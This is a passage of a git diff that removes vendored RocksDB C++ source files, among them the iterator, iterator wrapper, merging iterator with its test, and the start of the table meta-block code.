-  MinIteratorComparator(const Comparator* comparator) :
-    comparator_(comparator) {}
-
-  bool operator()(IteratorWrapper* a, IteratorWrapper* b) const {
-    return comparator_->Compare(a->key(), b->key()) > 0;
-  }
- private:
-  const Comparator* comparator_;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/iterator.cc b/thirdparty/rocksdb/table/iterator.cc
deleted file mode 100644
index ed6a2cd..0000000
--- a/thirdparty/rocksdb/table/iterator.cc
+++ /dev/null
@@ -1,193 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "rocksdb/iterator.h"
-#include "table/internal_iterator.h"
-#include "table/iterator_wrapper.h"
-#include "util/arena.h"
-
-namespace rocksdb {
-
-Cleanable::Cleanable() {
-  cleanup_.function = nullptr;
-  cleanup_.next = nullptr;
-}
-
-Cleanable::~Cleanable() { DoCleanup(); }
-
-Cleanable::Cleanable(Cleanable&& other) {
-  *this = std::move(other);
-}
-
-Cleanable& Cleanable::operator=(Cleanable&& other) {
-  if (this != &other) {
-    cleanup_ = other.cleanup_;
-    other.cleanup_.function = nullptr;
-    other.cleanup_.next = nullptr;
-  }
-  return *this;
-}
-
-// If the entire linked list was on heap we could have simply add attach one
-// link list to another. However the head is an embeded object to avoid the cost
-// of creating objects for most of the use cases when the Cleanable has only one
-// Cleanup to do. We could put evernything on heap if benchmarks show no
-// negative impact on performance.
-// Also we need to iterate on the linked list since there is no pointer to the
-// tail. We can add the tail pointer but maintainin it might negatively impact
-// the perforamnce for the common case of one cleanup where tail pointer is not
-// needed. Again benchmarks could clarify that.
-// Even without a tail pointer we could iterate on the list, find the tail, and
-// have only that node updated without the need to insert the Cleanups one by
-// one. This however would be redundant when the source Cleanable has one or a
-// few Cleanups which is the case most of the time.
-// TODO(myabandeh): if the list is too long we should maintain a tail pointer
-// and have the entire list (minus the head that has to be inserted separately)
-// merged with the target linked list at once.
-void Cleanable::DelegateCleanupsTo(Cleanable* other) {
-  assert(other != nullptr);
-  if (cleanup_.function == nullptr) {
-    return;
-  }
-  Cleanup* c = &cleanup_;
-  other->RegisterCleanup(c->function, c->arg1, c->arg2);
-  c = c->next;
-  while (c != nullptr) {
-    Cleanup* next = c->next;
-    other->RegisterCleanup(c);
-    c = next;
-  }
-  cleanup_.function = nullptr;
-  cleanup_.next = nullptr;
-}
-
-void Cleanable::RegisterCleanup(Cleanable::Cleanup* c) {
-  assert(c != nullptr);
-  if (cleanup_.function == nullptr) {
-    cleanup_.function = c->function;
-    cleanup_.arg1 = c->arg1;
-    cleanup_.arg2 = c->arg2;
-    delete c;
-  } else {
-    c->next = cleanup_.next;
-    cleanup_.next = c;
-  }
-}
-
-void Cleanable::RegisterCleanup(CleanupFunction func, void* arg1, void* arg2) {
-  assert(func != nullptr);
-  Cleanup* c;
-  if (cleanup_.function == nullptr) {
-    c = &cleanup_;
-  } else {
-    c = new Cleanup;
-    c->next = cleanup_.next;
-    cleanup_.next = c;
-  }
-  c->function = func;
-  c->arg1 = arg1;
-  c->arg2 = arg2;
-}
-
-Status Iterator::GetProperty(std::string prop_name, std::string* prop) {
-  if (prop == nullptr) {
-    return Status::InvalidArgument("prop is nullptr");
-  }
-  if (prop_name == "rocksdb.iterator.is-key-pinned") {
-    *prop = "0";
-    return Status::OK();
-  }
-  return Status::InvalidArgument("Undentified property.");
-}
-
-namespace {
-class EmptyIterator : public Iterator {
- public:
-  explicit EmptyIterator(const Status& s) : status_(s) { }
-  virtual bool Valid() const override { return false; }
-  virtual void Seek(const Slice& target) override {}
-  virtual void SeekForPrev(const Slice& target) override {}
-  virtual void SeekToFirst() override {}
-  virtual void SeekToLast() override {}
-  virtual void Next() override { assert(false); }
-  virtual void Prev() override { assert(false); }
-  Slice key() const override {
-    assert(false);
-    return Slice();
-  }
-  Slice value() const override {
-    assert(false);
-    return Slice();
-  }
-  virtual Status status() const override { return status_; }
-
- private:
-  Status status_;
-};
-
-class EmptyInternalIterator : public InternalIterator {
- public:
-  explicit EmptyInternalIterator(const Status& s) : status_(s) {}
-  virtual bool Valid() const override { return false; }
-  virtual void Seek(const Slice& target) override {}
-  virtual void SeekForPrev(const Slice& target) override {}
-  virtual void SeekToFirst() override {}
-  virtual void SeekToLast() override {}
-  virtual void Next() override { assert(false); }
-  virtual void Prev() override { assert(false); }
-  Slice key() const override {
-    assert(false);
-    return Slice();
-  }
-  Slice value() const override {
-    assert(false);
-    return Slice();
-  }
-  virtual Status status() const override { return status_; }
-
- private:
-  Status status_;
-};
-}  // namespace
-
-Iterator* NewEmptyIterator() {
-  return new EmptyIterator(Status::OK());
-}
-
-Iterator* NewErrorIterator(const Status& status) {
-  return new EmptyIterator(status);
-}
-
-InternalIterator* NewEmptyInternalIterator() {
-  return new EmptyInternalIterator(Status::OK());
-}
-
-InternalIterator* NewEmptyInternalIterator(Arena* arena) {
-  if (arena == nullptr) {
-    return NewEmptyInternalIterator();
-  } else {
-    auto mem = arena->AllocateAligned(sizeof(EmptyIterator));
-    return new (mem) EmptyInternalIterator(Status::OK());
-  }
-}
-
-InternalIterator* NewErrorInternalIterator(const Status& status) {
-  return new EmptyInternalIterator(status);
-}
-
-InternalIterator* NewErrorInternalIterator(const Status& status, Arena* arena) {
-  if (arena == nullptr) {
-    return NewErrorInternalIterator(status);
-  } else {
-    auto mem = arena->AllocateAligned(sizeof(EmptyIterator));
-    return new (mem) EmptyInternalIterator(status);
-  }
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/iterator_wrapper.h b/thirdparty/rocksdb/table/iterator_wrapper.h
deleted file mode 100644
index f14acdb..0000000
--- a/thirdparty/rocksdb/table/iterator_wrapper.h
+++ /dev/null
@@ -1,106 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#include <set>
-
-#include "table/internal_iterator.h"
-
-namespace rocksdb {
-
-// A internal wrapper class with an interface similar to Iterator that caches
-// the valid() and key() results for an underlying iterator.
-// This can help avoid virtual function calls and also gives better
-// cache locality.
-class IteratorWrapper {
- public:
-  IteratorWrapper() : iter_(nullptr), valid_(false) {}
-  explicit IteratorWrapper(InternalIterator* _iter) : iter_(nullptr) {
-    Set(_iter);
-  }
-  ~IteratorWrapper() {}
-  InternalIterator* iter() const { return iter_; }
-
-  // Set the underlying Iterator to _iter and return
-  // previous underlying Iterator.
-  InternalIterator* Set(InternalIterator* _iter) {
-    InternalIterator* old_iter = iter_;
-
-    iter_ = _iter;
-    if (iter_ == nullptr) {
-      valid_ = false;
-    } else {
-      Update();
-    }
-    return old_iter;
-  }
-
-  void DeleteIter(bool is_arena_mode) {
-    if (iter_) {
-      if (!is_arena_mode) {
-        delete iter_;
-      } else {
-        iter_->~InternalIterator();
-      }
-    }
-  }
-
-  // Iterator interface methods
-  bool Valid() const        { return valid_; }
-  Slice key() const         { assert(Valid()); return key_; }
-  Slice value() const       { assert(Valid()); return iter_->value(); }
-  // Methods below require iter() != nullptr
-  Status status() const     { assert(iter_); return iter_->status(); }
-  void Next()               { assert(iter_); iter_->Next();        Update(); }
-  void Prev()               { assert(iter_); iter_->Prev();        Update(); }
-  void Seek(const Slice& k) { assert(iter_); iter_->Seek(k);       Update(); }
-  void SeekForPrev(const Slice& k) {
-    assert(iter_);
-    iter_->SeekForPrev(k);
-    Update();
-  }
-  void SeekToFirst()        { assert(iter_); iter_->SeekToFirst(); Update(); }
-  void SeekToLast()         { assert(iter_); iter_->SeekToLast();  Update(); }
-
-  void SetPinnedItersMgr(PinnedIteratorsManager* pinned_iters_mgr) {
-    assert(iter_);
-    iter_->SetPinnedItersMgr(pinned_iters_mgr);
-  }
-  bool IsKeyPinned() const {
-    assert(Valid());
-    return iter_->IsKeyPinned();
-  }
-  bool IsValuePinned() const {
-    assert(Valid());
-    return iter_->IsValuePinned();
-  }
-
- private:
-  void Update() {
-    valid_ = iter_->Valid();
-    if (valid_) {
-      key_ = iter_->key();
-    }
-  }
-
-  InternalIterator* iter_;
-  bool valid_;
-  Slice key_;
-};
-
-class Arena;
-// Return an empty iterator (yields nothing) allocated from arena.
-extern InternalIterator* NewEmptyInternalIterator(Arena* arena);
-
-// Return an empty iterator with the specified status, allocated arena.
-extern InternalIterator* NewErrorInternalIterator(const Status& status,
-                                                  Arena* arena);
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/merger_test.cc b/thirdparty/rocksdb/table/merger_test.cc
deleted file mode 100644
index 379a6f4..0000000
--- a/thirdparty/rocksdb/table/merger_test.cc
+++ /dev/null
@@ -1,169 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <vector>
-#include <string>
-
-#include "table/merging_iterator.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-class MergerTest : public testing::Test {
- public:
-  MergerTest()
-      : rnd_(3), merging_iterator_(nullptr), single_iterator_(nullptr) {}
-  ~MergerTest() = default;
-  std::vector<std::string> GenerateStrings(size_t len, int string_len) {
-    std::vector<std::string> ret;
-    for (size_t i = 0; i < len; ++i) {
-      ret.push_back(test::RandomHumanReadableString(&rnd_, string_len));
-    }
-    return ret;
-  }
-
-  void AssertEquivalence() {
-    auto a = merging_iterator_.get();
-    auto b = single_iterator_.get();
-    if (!a->Valid()) {
-      ASSERT_TRUE(!b->Valid());
-    } else {
-      ASSERT_TRUE(b->Valid());
-      ASSERT_EQ(b->key().ToString(), a->key().ToString());
-      ASSERT_EQ(b->value().ToString(), a->value().ToString());
-    }
-  }
-
-  void SeekToRandom() { Seek(test::RandomHumanReadableString(&rnd_, 5)); }
-
-  void Seek(std::string target) {
-    merging_iterator_->Seek(target);
-    single_iterator_->Seek(target);
-  }
-
-  void SeekToFirst() {
-    merging_iterator_->SeekToFirst();
-    single_iterator_->SeekToFirst();
-  }
-
-  void SeekToLast() {
-    merging_iterator_->SeekToLast();
-    single_iterator_->SeekToLast();
-  }
-
-  void Next(int times) {
-    for (int i = 0; i < times && merging_iterator_->Valid(); ++i) {
-      AssertEquivalence();
-      merging_iterator_->Next();
-      single_iterator_->Next();
-    }
-    AssertEquivalence();
-  }
-
-  void Prev(int times) {
-    for (int i = 0; i < times && merging_iterator_->Valid(); ++i) {
-      AssertEquivalence();
-      merging_iterator_->Prev();
-      single_iterator_->Prev();
-    }
-    AssertEquivalence();
-  }
-
-  void NextAndPrev(int times) {
-    for (int i = 0; i < times && merging_iterator_->Valid(); ++i) {
-      AssertEquivalence();
-      if (rnd_.OneIn(2)) {
-        merging_iterator_->Prev();
-        single_iterator_->Prev();
-      } else {
-        merging_iterator_->Next();
-        single_iterator_->Next();
-      }
-    }
-    AssertEquivalence();
-  }
-
-  void Generate(size_t num_iterators, size_t strings_per_iterator,
-                int letters_per_string) {
-    std::vector<InternalIterator*> small_iterators;
-    for (size_t i = 0; i < num_iterators; ++i) {
-      auto strings = GenerateStrings(strings_per_iterator, letters_per_string);
-      small_iterators.push_back(new test::VectorIterator(strings));
-      all_keys_.insert(all_keys_.end(), strings.begin(), strings.end());
-    }
-
-    merging_iterator_.reset(
-        NewMergingIterator(BytewiseComparator(), &small_iterators[0],
-                           static_cast<int>(small_iterators.size())));
-    single_iterator_.reset(new test::VectorIterator(all_keys_));
-  }
-
-  Random rnd_;
-  std::unique_ptr<InternalIterator> merging_iterator_;
-  std::unique_ptr<InternalIterator> single_iterator_;
-  std::vector<std::string> all_keys_;
-};
-
-TEST_F(MergerTest, SeekToRandomNextTest) {
-  Generate(1000, 50, 50);
-  for (int i = 0; i < 10; ++i) {
-    SeekToRandom();
-    AssertEquivalence();
-    Next(50000);
-  }
-}
-
-TEST_F(MergerTest, SeekToRandomNextSmallStringsTest) {
-  Generate(1000, 50, 2);
-  for (int i = 0; i < 10; ++i) {
-    SeekToRandom();
-    AssertEquivalence();
-    Next(50000);
-  }
-}
-
-TEST_F(MergerTest, SeekToRandomPrevTest) {
-  Generate(1000, 50, 50);
-  for (int i = 0; i < 10; ++i) {
-    SeekToRandom();
-    AssertEquivalence();
-    Prev(50000);
-  }
-}
-
-TEST_F(MergerTest, SeekToRandomRandomTest) {
-  Generate(200, 50, 50);
-  for (int i = 0; i < 3; ++i) {
-    SeekToRandom();
-    AssertEquivalence();
-    NextAndPrev(5000);
-  }
-}
-
-TEST_F(MergerTest, SeekToFirstTest) {
-  Generate(1000, 50, 50);
-  for (int i = 0; i < 10; ++i) {
-    SeekToFirst();
-    AssertEquivalence();
-    Next(50000);
-  }
-}
-
-TEST_F(MergerTest, SeekToLastTest) {
-  Generate(1000, 50, 50);
-  for (int i = 0; i < 10; ++i) {
-    SeekToLast();
-    AssertEquivalence();
-    Prev(50000);
-  }
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/table/merging_iterator.cc b/thirdparty/rocksdb/table/merging_iterator.cc
deleted file mode 100644
index da30e1e..0000000
--- a/thirdparty/rocksdb/table/merging_iterator.cc
+++ /dev/null
@@ -1,404 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "table/merging_iterator.h"
-#include <string>
-#include <vector>
-#include "db/pinned_iterators_manager.h"
-#include "monitoring/perf_context_imp.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/iterator.h"
-#include "rocksdb/options.h"
-#include "table/internal_iterator.h"
-#include "table/iter_heap.h"
-#include "table/iterator_wrapper.h"
-#include "util/arena.h"
-#include "util/autovector.h"
-#include "util/heap.h"
-#include "util/stop_watch.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-// Without anonymous namespace here, we fail the warning -Wmissing-prototypes
-namespace {
-typedef BinaryHeap<IteratorWrapper*, MaxIteratorComparator> MergerMaxIterHeap;
-typedef BinaryHeap<IteratorWrapper*, MinIteratorComparator> MergerMinIterHeap;
-}  // namespace
-
-const size_t kNumIterReserve = 4;
-
-class MergingIterator : public InternalIterator {
- public:
-  MergingIterator(const Comparator* comparator, InternalIterator** children,
-                  int n, bool is_arena_mode, bool prefix_seek_mode)
-      : is_arena_mode_(is_arena_mode),
-        comparator_(comparator),
-        current_(nullptr),
-        direction_(kForward),
-        minHeap_(comparator_),
-        prefix_seek_mode_(prefix_seek_mode),
-        pinned_iters_mgr_(nullptr) {
-    children_.resize(n);
-    for (int i = 0; i < n; i++) {
-      children_[i].Set(children[i]);
-    }
-    for (auto& child : children_) {
-      if (child.Valid()) {
-        minHeap_.push(&child);
-      }
-    }
-    current_ = CurrentForward();
-  }
-
-  virtual void AddIterator(InternalIterator* iter) {
-    assert(direction_ == kForward);
-    children_.emplace_back(iter);
-    if (pinned_iters_mgr_) {
-      iter->SetPinnedItersMgr(pinned_iters_mgr_);
-    }
-    auto new_wrapper = children_.back();
-    if (new_wrapper.Valid()) {
-      minHeap_.push(&new_wrapper);
-      current_ = CurrentForward();
-    }
-  }
-
-  virtual ~MergingIterator() {
-    for (auto& child : children_) {
-      child.DeleteIter(is_arena_mode_);
-    }
-  }
-
-  virtual bool Valid() const override { return (current_ != nullptr); }
-
-  virtual void SeekToFirst() override {
-    ClearHeaps();
-    for (auto& child : children_) {
-      child.SeekToFirst();
-      if (child.Valid()) {
-        minHeap_.push(&child);
-      }
-    }
-    direction_ = kForward;
-    current_ = CurrentForward();
-  }
-
-  virtual void SeekToLast() override {
-    ClearHeaps();
-    InitMaxHeap();
-    for (auto& child : children_) {
-      child.SeekToLast();
-      if (child.Valid()) {
-        maxHeap_->push(&child);
-      }
-    }
-    direction_ = kReverse;
-    current_ = CurrentReverse();
-  }
-
-  virtual void Seek(const Slice& target) override {
-    ClearHeaps();
-    for (auto& child : children_) {
-      {
-        PERF_TIMER_GUARD(seek_child_seek_time);
-        child.Seek(target);
-      }
-      PERF_COUNTER_ADD(seek_child_seek_count, 1);
-
-      if (child.Valid()) {
-        PERF_TIMER_GUARD(seek_min_heap_time);
-        minHeap_.push(&child);
-      }
-    }
-    direction_ = kForward;
-    {
-      PERF_TIMER_GUARD(seek_min_heap_time);
-      current_ = CurrentForward();
-    }
-  }
-
-  virtual void SeekForPrev(const Slice& target) override {
-    ClearHeaps();
-    InitMaxHeap();
-
-    for (auto& child : children_) {
-      {
-        PERF_TIMER_GUARD(seek_child_seek_time);
-        child.SeekForPrev(target);
-      }
-      PERF_COUNTER_ADD(seek_child_seek_count, 1);
-
-      if (child.Valid()) {
-        PERF_TIMER_GUARD(seek_max_heap_time);
-        maxHeap_->push(&child);
-      }
-    }
-    direction_ = kReverse;
-    {
-      PERF_TIMER_GUARD(seek_max_heap_time);
-      current_ = CurrentReverse();
-    }
-  }
-
-  virtual void Next() override {
-    assert(Valid());
-
-    // Ensure that all children are positioned after key().
-    // If we are moving in the forward direction, it is already
-    // true for all of the non-current children since current_ is
-    // the smallest child and key() == current_->key().
-    if (direction_ != kForward) {
-      // Otherwise, advance the non-current children.  We advance current_
-      // just after the if-block.
-      ClearHeaps();
-      for (auto& child : children_) {
-        if (&child != current_) {
-          child.Seek(key());
-          if (child.Valid() && comparator_->Equal(key(), child.key())) {
-            child.Next();
-          }
-        }
-        if (child.Valid()) {
-          minHeap_.push(&child);
-        }
-      }
-      direction_ = kForward;
-      // The loop advanced all non-current children to be > key() so current_
-      // should still be strictly the smallest key.
-      assert(current_ == CurrentForward());
-    }
-
-    // For the heap modifications below to be correct, current_ must be the
-    // current top of the heap.
-    assert(current_ == CurrentForward());
-
-    // as the current points to the current record. move the iterator forward.
-    current_->Next();
-    if (current_->Valid()) {
-      // current is still valid after the Next() call above.  Call
-      // replace_top() to restore the heap property.  When the same child
-      // iterator yields a sequence of keys, this is cheap.
-      minHeap_.replace_top(current_);
-    } else {
-      // current stopped being valid, remove it from the heap.
-      minHeap_.pop();
-    }
-    current_ = CurrentForward();
-  }
-
-  virtual void Prev() override {
-    assert(Valid());
-    // Ensure that all children are positioned before key().
-    // If we are moving in the reverse direction, it is already
-    // true for all of the non-current children since current_ is
-    // the largest child and key() == current_->key().
-    if (direction_ != kReverse) {
-      // Otherwise, retreat the non-current children.  We retreat current_
-      // just after the if-block.
-      ClearHeaps();
-      InitMaxHeap();
-      for (auto& child : children_) {
-        if (&child != current_) {
-          if (!prefix_seek_mode_) {
-            child.Seek(key());
-            if (child.Valid()) {
-              // Child is at first entry >= key().  Step back one to be < key()
-              TEST_SYNC_POINT_CALLBACK("MergeIterator::Prev:BeforePrev",
-                                       &child);
-              child.Prev();
-            } else {
-              // Child has no entries >= key().  Position at last entry.
-              TEST_SYNC_POINT("MergeIterator::Prev:BeforeSeekToLast");
-              child.SeekToLast();
-            }
-          } else {
-            child.SeekForPrev(key());
-            if (child.Valid() && comparator_->Equal(key(), child.key())) {
-              child.Prev();
-            }
-          }
-        }
-        if (child.Valid()) {
-          maxHeap_->push(&child);
-        }
-      }
-      direction_ = kReverse;
-      if (!prefix_seek_mode_) {
-        // Note that we don't do assert(current_ == CurrentReverse()) here
-        // because it is possible to have some keys larger than the seek-key
-        // inserted between Seek() and SeekToLast(), which makes current_ not
-        // equal to CurrentReverse().
-        current_ = CurrentReverse();
-      }
-      // The loop advanced all non-current children to be < key() so current_
-      // should still be strictly the smallest key.
-      assert(current_ == CurrentReverse());
-    }
-
-    // For the heap modifications below to be correct, current_ must be the
-    // current top of the heap.
-    assert(current_ == CurrentReverse());
-
-    current_->Prev();
-    if (current_->Valid()) {
-      // current is still valid after the Prev() call above.  Call
-      // replace_top() to restore the heap property.  When the same child
-      // iterator yields a sequence of keys, this is cheap.
-      maxHeap_->replace_top(current_);
-    } else {
-      // current stopped being valid, remove it from the heap.
-      maxHeap_->pop();
-    }
-    current_ = CurrentReverse();
-  }
-
-  virtual Slice key() const override {
-    assert(Valid());
-    return current_->key();
-  }
-
-  virtual Slice value() const override {
-    assert(Valid());
-    return current_->value();
-  }
-
-  virtual Status status() const override {
-    Status s;
-    for (auto& child : children_) {
-      s = child.status();
-      if (!s.ok()) {
-        break;
-      }
-    }
-    return s;
-  }
-
-  virtual void SetPinnedItersMgr(
-      PinnedIteratorsManager* pinned_iters_mgr) override {
-    pinned_iters_mgr_ = pinned_iters_mgr;
-    for (auto& child : children_) {
-      child.SetPinnedItersMgr(pinned_iters_mgr);
-    }
-  }
-
-  virtual bool IsKeyPinned() const override {
-    assert(Valid());
-    return pinned_iters_mgr_ && pinned_iters_mgr_->PinningEnabled() &&
-           current_->IsKeyPinned();
-  }
-
-  virtual bool IsValuePinned() const override {
-    assert(Valid());
-    return pinned_iters_mgr_ && pinned_iters_mgr_->PinningEnabled() &&
-           current_->IsValuePinned();
-  }
-
- private:
-  // Clears heaps for both directions, used when changing direction or seeking
-  void ClearHeaps();
-  // Ensures that maxHeap_ is initialized when starting to go in the reverse
-  // direction
-  void InitMaxHeap();
-
-  bool is_arena_mode_;
-  const Comparator* comparator_;
-  autovector<IteratorWrapper, kNumIterReserve> children_;
-
-  // Cached pointer to child iterator with the current key, or nullptr if no
-  // child iterators are valid.  This is the top of minHeap_ or maxHeap_
-  // depending on the direction.
-  IteratorWrapper* current_;
-  // Which direction is the iterator moving?
-  enum Direction {
-    kForward,
-    kReverse
-  };
-  Direction direction_;
-  MergerMinIterHeap minHeap_;
-  bool prefix_seek_mode_;
-
-  // Max heap is used for reverse iteration, which is way less common than
-  // forward.  Lazily initialize it to save memory.
-  std::unique_ptr<MergerMaxIterHeap> maxHeap_;
-  PinnedIteratorsManager* pinned_iters_mgr_;
-
-  IteratorWrapper* CurrentForward() const {
-    assert(direction_ == kForward);
-    return !minHeap_.empty() ? minHeap_.top() : nullptr;
-  }
-
-  IteratorWrapper* CurrentReverse() const {
-    assert(direction_ == kReverse);
-    assert(maxHeap_);
-    return !maxHeap_->empty() ? maxHeap_->top() : nullptr;
-  }
-};
-
-void MergingIterator::ClearHeaps() {
-  minHeap_.clear();
-  if (maxHeap_) {
-    maxHeap_->clear();
-  }
-}
-
-void MergingIterator::InitMaxHeap() {
-  if (!maxHeap_) {
-    maxHeap_.reset(new MergerMaxIterHeap(comparator_));
-  }
-}
-
-InternalIterator* NewMergingIterator(const Comparator* cmp,
-                                     InternalIterator** list, int n,
-                                     Arena* arena, bool prefix_seek_mode) {
-  assert(n >= 0);
-  if (n == 0) {
-    return NewEmptyInternalIterator(arena);
-  } else if (n == 1) {
-    return list[0];
-  } else {
-    if (arena == nullptr) {
-      return new MergingIterator(cmp, list, n, false, prefix_seek_mode);
-    } else {
-      auto mem = arena->AllocateAligned(sizeof(MergingIterator));
-      return new (mem) MergingIterator(cmp, list, n, true, prefix_seek_mode);
-    }
-  }
-}
-
-MergeIteratorBuilder::MergeIteratorBuilder(const Comparator* comparator,
-                                           Arena* a, bool prefix_seek_mode)
-    : first_iter(nullptr), use_merging_iter(false), arena(a) {
-  auto mem = arena->AllocateAligned(sizeof(MergingIterator));
-  merge_iter =
-      new (mem) MergingIterator(comparator, nullptr, 0, true, prefix_seek_mode);
-}
-
-void MergeIteratorBuilder::AddIterator(InternalIterator* iter) {
-  if (!use_merging_iter && first_iter != nullptr) {
-    merge_iter->AddIterator(first_iter);
-    use_merging_iter = true;
-  }
-  if (use_merging_iter) {
-    merge_iter->AddIterator(iter);
-  } else {
-    first_iter = iter;
-  }
-}
-
-InternalIterator* MergeIteratorBuilder::Finish() {
-  if (!use_merging_iter) {
-    return first_iter;
-  } else {
-    auto ret = merge_iter;
-    merge_iter = nullptr;
-    return ret;
-  }
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/merging_iterator.h b/thirdparty/rocksdb/table/merging_iterator.h
deleted file mode 100644
index 48a28d8..0000000
--- a/thirdparty/rocksdb/table/merging_iterator.h
+++ /dev/null
@@ -1,62 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#include "rocksdb/types.h"
-
-namespace rocksdb {
-
-class Comparator;
-class InternalIterator;
-class Env;
-class Arena;
-
-// Return an iterator that provided the union of the data in
-// children[0,n-1].  Takes ownership of the child iterators and
-// will delete them when the result iterator is deleted.
-//
-// The result does no duplicate suppression.  I.e., if a particular
-// key is present in K child iterators, it will be yielded K times.
-//
-// REQUIRES: n >= 0
-extern InternalIterator* NewMergingIterator(const Comparator* comparator,
-                                            InternalIterator** children, int n,
-                                            Arena* arena = nullptr,
-                                            bool prefix_seek_mode = false);
-
-class MergingIterator;
-
-// A builder class to build a merging iterator by adding iterators one by one.
-class MergeIteratorBuilder {
- public:
-  // comparator: the comparator used in merging comparator
-  // arena: where the merging iterator needs to be allocated from.
-  explicit MergeIteratorBuilder(const Comparator* comparator, Arena* arena,
-                                bool prefix_seek_mode = false);
-  ~MergeIteratorBuilder() {}
-
-  // Add iter to the merging iterator.
-  void AddIterator(InternalIterator* iter);
-
-  // Get arena used to build the merging iterator. It is called one a child
-  // iterator needs to be allocated.
-  Arena* GetArena() { return arena; }
-
-  // Return the result merging iterator.
-  InternalIterator* Finish();
-
- private:
-  MergingIterator* merge_iter;
-  InternalIterator* first_iter;
-  bool use_merging_iter;
-  Arena* arena;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/meta_blocks.cc b/thirdparty/rocksdb/table/meta_blocks.cc
deleted file mode 100644
index 19925d7..0000000
--- a/thirdparty/rocksdb/table/meta_blocks.cc
+++ /dev/null
@@ -1,414 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#include "table/meta_blocks.h"
-
-#include <map>
-#include <string>
-
-#include "db/table_properties_collector.h"
-#include "rocksdb/table.h"
-#include "rocksdb/table_properties.h"
-#include "table/block.h"
-#include "table/format.h"
-#include "table/internal_iterator.h"
-#include "table/persistent_cache_helper.h"
-#include "table/table_properties_internal.h"
-#include "util/coding.h"
-#include "util/file_reader_writer.h"
-
-namespace rocksdb {
-
-MetaIndexBuilder::MetaIndexBuilder()
-    : meta_index_block_(new BlockBuilder(1 /* restart interval */)) {}
-
-void MetaIndexBuilder::Add(const std::string& key,
-                           const BlockHandle& handle) {
-  std::string handle_encoding;
-  handle.EncodeTo(&handle_encoding);
-  meta_block_handles_.insert({key, handle_encoding});
-}
-
-Slice MetaIndexBuilder::Finish() {
-  for (const auto& metablock : meta_block_handles_) {
-    meta_index_block_->Add(metablock.first, metablock.second);
-  }
-  return meta_index_block_->Finish();
-}
-
-PropertyBlockBuilder::PropertyBlockBuilder()
-    : properties_block_(new BlockBuilder(1 /* restart interval */)) {}
-
-void PropertyBlockBuilder::Add(const std::string& name,
-                               const std::string& val) {
-  props_.insert({name, val});
-}
-
-void PropertyBlockBuilder::Add(const std::string& name, uint64_t val) {
-  assert(props_.find(name) == props_.end());
-
-  std::string dst;
-  PutVarint64(&dst, val);
-
-  Add(name, dst);
-}
-
-void PropertyBlockBuilder::Add(
-    const UserCollectedProperties& user_collected_properties) {
-  for (const auto& prop : user_collected_properties) {
-    Add(prop.first, prop.second);
-  }
-}
-
-void PropertyBlockBuilder::AddTableProperty(const TableProperties& props) {
-  Add(TablePropertiesNames::kRawKeySize, props.raw_key_size);
-  Add(TablePropertiesNames::kRawValueSize, props.raw_value_size);
-  Add(TablePropertiesNames::kDataSize, props.data_size);
-  Add(TablePropertiesNames::kIndexSize, props.index_size);
-  if (props.index_partitions != 0) {
-    Add(TablePropertiesNames::kIndexPartitions, props.index_partitions);
-    Add(TablePropertiesNames::kTopLevelIndexSize, props.top_level_index_size);
-  }
-  Add(TablePropertiesNames::kNumEntries, props.num_entries);
-  Add(TablePropertiesNames::kNumDataBlocks, props.num_data_blocks);
-  Add(TablePropertiesNames::kFilterSize, props.filter_size);
-  Add(TablePropertiesNames::kFormatVersion, props.format_version);
-  Add(TablePropertiesNames::kFixedKeyLen, props.fixed_key_len);
-  Add(TablePropertiesNames::kColumnFamilyId, props.column_family_id);
-  Add(TablePropertiesNames::kCreationTime, props.creation_time);
-  Add(TablePropertiesNames::kOldestKeyTime, props.oldest_key_time);
-
-  if (!props.filter_policy_name.empty()) {
-    Add(TablePropertiesNames::kFilterPolicy, props.filter_policy_name);
-  }
-  if (!props.comparator_name.empty()) {
